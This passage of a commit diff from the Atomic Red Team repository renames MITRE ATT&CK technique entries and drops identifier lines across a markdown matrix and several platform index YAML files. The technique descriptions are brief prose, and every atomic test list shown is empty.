| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
@@ -135,7 +135,7 @@
| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
atomics/Indexes/azure-ad-index.yaml
+8 -18
View File
@@ -11566,7 +11566,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11596,7 +11596,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20754,7 +20753,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20790,7 +20789,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23637,7 +23635,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23660,7 +23658,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27968,7 +27965,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27989,7 +27986,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32777,7 +32773,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32813,7 +32809,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -33299,7 +33294,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -33329,7 +33324,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -35100,7 +35094,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -35127,7 +35121,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -35529,7 +35522,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -45665,7 +45657,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45695,7 +45687,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -57541,7 +57532,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/containers-index.yaml
+8 -18
View File
@@ -11541,7 +11541,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11571,7 +11571,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20412,7 +20411,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20448,7 +20447,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23405,7 +23403,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23428,7 +23426,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27835,7 +27832,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27856,7 +27853,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -32214,7 +32210,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -32250,7 +32246,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32736,7 +32731,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32766,7 +32761,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -34578,7 +34572,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34605,7 +34599,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -35007,7 +35000,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44942,7 +44934,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44972,7 +44964,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56886,7 +56877,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/esxi-index.yaml
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20063,7 +20062,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20099,7 +20098,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -22946,7 +22944,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22969,7 +22967,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27154,7 +27151,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27175,7 +27172,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31498,7 +31494,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31534,7 +31530,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32020,7 +32015,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32050,7 +32045,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33821,7 +33815,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -33848,7 +33842,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34250,7 +34243,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44152,7 +44144,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44182,7 +44174,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -55896,7 +55887,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/google-workspace-index.yaml
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20121,7 +20120,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20157,7 +20156,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -23062,7 +23060,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -23085,7 +23083,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27270,7 +27267,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27291,7 +27288,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31614,7 +31610,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31650,7 +31646,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32136,7 +32131,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32166,7 +32161,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33995,7 +33989,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -34022,7 +34016,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34424,7 +34417,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44326,7 +44318,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44356,7 +44348,6 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -56070,7 +56061,6 @@ initial-access:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1078.001:
technique:
atomics/Indexes/iaas-index.yaml
+8 -18
View File
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,7 +11500,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -20063,7 +20062,7 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -20099,7 +20098,6 @@ privilege-escalation:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -22946,7 +22944,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -22969,7 +22967,6 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests: []
T1059.009:
technique:
@@ -27154,7 +27151,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -27175,7 +27172,6 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests: []
T1098.007:
technique:
@@ -31498,7 +31494,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
@@ -31534,7 +31530,6 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests: []
T1037.003:
technique:
@@ -32020,7 +32015,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32050,7 +32045,6 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -33821,7 +33815,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -33848,7 +33842,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
@@ -34250,7 +34243,6 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests: []
T1205:
technique:
@@ -44152,7 +44144,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
